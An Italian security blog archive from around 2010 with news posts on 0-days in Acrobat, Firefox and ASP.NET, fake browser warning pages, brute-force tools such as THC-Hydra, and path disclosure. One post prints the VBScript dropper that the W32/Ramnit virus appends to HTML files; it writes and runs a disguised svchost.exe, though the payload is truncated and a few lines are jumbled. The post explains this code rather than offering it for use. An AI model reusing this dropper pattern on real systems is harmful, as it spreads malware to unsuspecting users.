Sicurezza informatica
È in circolazione del malware che sfrutta una vulnerabilità di Acrobat Reader appena scoperta.
La vulnerabilità interessa i file PDF che includono contenuti in Flash visualizzati attraverso Acrobat Reader.
I prodotti interessati sono:
Il sito del premio Nobel per la pace sarebbe stato compromesso da persone che sarebbero riuscite a modificare alcune pagine del sito aggiungendo del codice HTML e JavaScript in grado di sfruttare una vulnerabilità 0-day dell’ultima versione di Firefox.
La modifica non autorizzata è stata scoperta e rimossa.
Il codice dannoso aggiunto in maniera illegale caricava il sito legittimo in un IFRAME mentre forzava il download sul client di un programma che consentiva l’accesso remoto al computer attaccato.
Il codice dannoso aveva effetto solamente sui client Windows e l’accesso remoto avveniva con il medesimo livello di sicurezza dell’utente.
La vulnerabilità di Firefox verrà presumibilmente eliminata entro pochi giorni, aspettiamoci quindi una nuova release del browser, che dovrà essere installata quanto prima. (via Darknet).
Di siti che invitano a scaricare finti antivirus che provocano un sacco di danni ce ne sono tantissimi.
Dopo anni che non veniva più utilizzato, è tornato di moda un sistema di diffusione di malware basato sull’imitazione della pagina di sicurezza di Firefox come ad esempio questa:
Anni fa si erano verificati attacchi di social engineering basati sull’imitazione delle pagine di errore di Internet Explorer.
Noterete subito il pulsante sospetto che invita a scaricare un aggiornamento. Per giunta, può capitare che il download del malware parta in automatico senza che vengano premuti pulsanti.
La protezione da questi attacchi è relativamente semplice, purché ci si fermi un attimo e non si clicki su tutto quello che appare a video.
Se avete installato una versione di una lingua diversa dall’inglese, dovreste leggere quel messaggio nella vostra lingua. Questo è un vantaggio per chi utilizza software (sistemi operativi o applicativi che siano) in lingue diverse dall’inglese perché un messaggio che sembra provenire dal sistema operativo o dal browser ma è in una lingua diversa dovrebbe far scattare un segnale d’allarme.
Inoltre, il sito di Firefox mette a disposizione due pagine per verificare la funzionalità antiphishing e antimalware. Se clickate su questi due link con Firefox vi appare la vera pagina con cui il browser vi avvisa del pericolo. (via F-Secure)
Leggo, gironzolando in rete, che molte delle applicazioni per Facebook, alcune delle quali piuttosto famose, abbiano trasmesso informazioni personali degli utenti che le utilizzavano. Il primo a dare questa notizia è il Wall Street Journal, in questo articolo.
A dire il vero non mi interessa sapere se ciò sia vero o meno, ma se anche lo fosse, trovo assolutamente ridicolo commentare questa notizia attaccando Zuckerberg o le società dietro alle applicazioni… era ovvio. In qualche modo questa gente deve pur vivere e acquisire nomi, indirizzi email e, dove possibile, altre informazioni è il modo più semplice e immediato per potersi “mantenere”.
Gridare allo scandalo, ora, mi puzza tanto di ipocrisia o ignoranza… e mi danno fastidio entrambi.
In mancanza di altri programmi i browser possono essere utilizzate anche come client FTP.
Per collegarsi, ad esempio, a mail.siamogeek.com con l’utente utente e la password segreta si può digitare questo URL:
ftp://utente:segreta@mail.siamogeek.com
Purtroppo Firefox registra questo URL nella cache, quindi se, dopo essersi collegati la prima volta a questo sito, si digita di nuovo l’inizio (o parte) dell’URL ecco cosa appare:
State, quindi, attenti se utilizzate browser altrui per collegarvi a siti di cui non volete rivelare la password.
Una segnalazione del baco è già presente in Bugzilla.
No, l’utente utilizzato per questa dimostrazione non esiste più, è inutile tentare, tanto non funziona. (via Bugtraq)
Dopo quasi un mese dalla diffusione di uno 0-day, Adobe rilascia finalmente un aggiornamento per il suo reader PDF, le cui versioni attuali diventano 9.4 e 8.2.5; le versioni precedenti non sono più supportate e dovrebbero essere aggiornate quanto prima.
Se non si verificano altre emergenze, il prossimo aggiornamento del software è previsto per l’8 febbraio 2011.
Sembra una delle tante leggende metropolitane, come quella del virus che si annidava nella memoria di configurazione del PC, invece è possibile.
Il virus in questione è W32/Ramnit che infetta file EXE, DLL e HTML.
Un volta caricato in memoria il virus accoda ai file HTML questo codice VBScript:
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000...0000000000000"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End
If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0
//--></SCRIPT>
Il codice qui sopra scrive un file SVCHOST.EXE (un nome che non desta sospetti se visto nel task manager di Windows) nella directory temporanea dell’utente prendendo il contenuto dalla variabile WriteData, che contiene il carico di infezione vero e proprio (notare che i primi due byte sono il magic number dei Portable Executable). Se la scrittura va a buon fine, lo script tenta di eseguire il file.
È vero: non è così immediato il fatto che ogni file HTML infettato diventi un vettore di infezione, ma questo è un ulteriore esempio di come file apparentemente innocui possano essere utilizzati per diffondere del malware. (via TrustedSource)
Come i coltelli, i piedi di porco e le armi da fuoco ci sono molti software che possono essere utilizzati per scopi positivi o negativi.
A differenza delle armi più o meno proprie, i software di attacco possono essere utilizzati per attaccare i propri server senza farsi del male.
THC-Hydra è uno di questi software. È incredibilmente semplice da installare e utilizzare e permette di tentare in parallelo molte coppie di utente/password contro vari tipi di servizi. Se un programma del genere riesce a bucare facilmente la vostra sicurezza, avete sicuramente un problema.
A parte l’utilizzo di password non facilissime da indovinare (p@55w0rd al posto di password non fa oramai nessuna differenza), uno dei metodi di difesa da questi tipi di scanner è sicuramente un software come fail2ban.
Elcomsoft Phone Password Breaker è un software venuto a 200 € in grado di eseguire un attacco di forza bruta alle password di
iOS e del Blackberry.
Il programma è in grado di utilizzare fino a 32 CPU e 8 GPU ATIAMD o nVIDIA per trovare la password. L’uso dei processori grafici per scardinare la sicurezza informatica non è nuovo: nel 2008 un gruppo guidato da Alexander Sotirov ha creato un finto certificato di sicurezza utilizzando i processori grafici di 300 PlayStation.
La nuova versione del software è in grado di operare anche sui backup di iOS e Blackberry, quindi non è necessario l’accesso fisico al dispositivo per considerarsi a rischio. (via Stefano Quintarelli)
Full path disclosure (letteralmente divulgazione del percorso completo) è una vulnerabilità di un sito tale per cui, in particolari condizioni di errore, viene rivelato il percorso completo della directory del server in cui si trovano i file di un sito.
Apparentemente potrebbe essere un problema minimale, ma è un dato che facilita molto la vita a chi vuole penetrare nel sistema utilizzando altri punti deboli di un sito.
Immaginiamo che ci sia un sito dinamico che carica le pagine in base ad un parametro passato nell’URL tipo
(altro…)[youtube=http://www.youtube.com/watch?v=yghiC_U2RaM&w=480]
Contrariamente a quanto riportato da Microsoft, sembra che gli attacchi che sfruttano la vulnerabilità di ASP.NET siano non solo fattibili, come mostra il video qui sopra, ma anche in corso.
La situazione sembra seria e chi amministra un sito esposto a Internet basato su ASP.NET dovrebbe al più presto prendere le contromisure consigliate da Microsoft per mitigare il problema.
La vulnerabilità in questione permette, di fatto, di passare attraverso la sicurezza del framework ASP.NET senza blocchi in poche decine di minuti. (via Schneier on Security)
Aggiornamento 28/9/2010 06:15: Microsoft rilascerà oggi un aggiornamento d’emergenza sul Download Center; pare che le contromisure consigliate non siano molto efficaci, quindi l’aggiornamento è d’obbligo.
Aggiornamento 28/9/2010 19:45: la patch è stata rilasciata.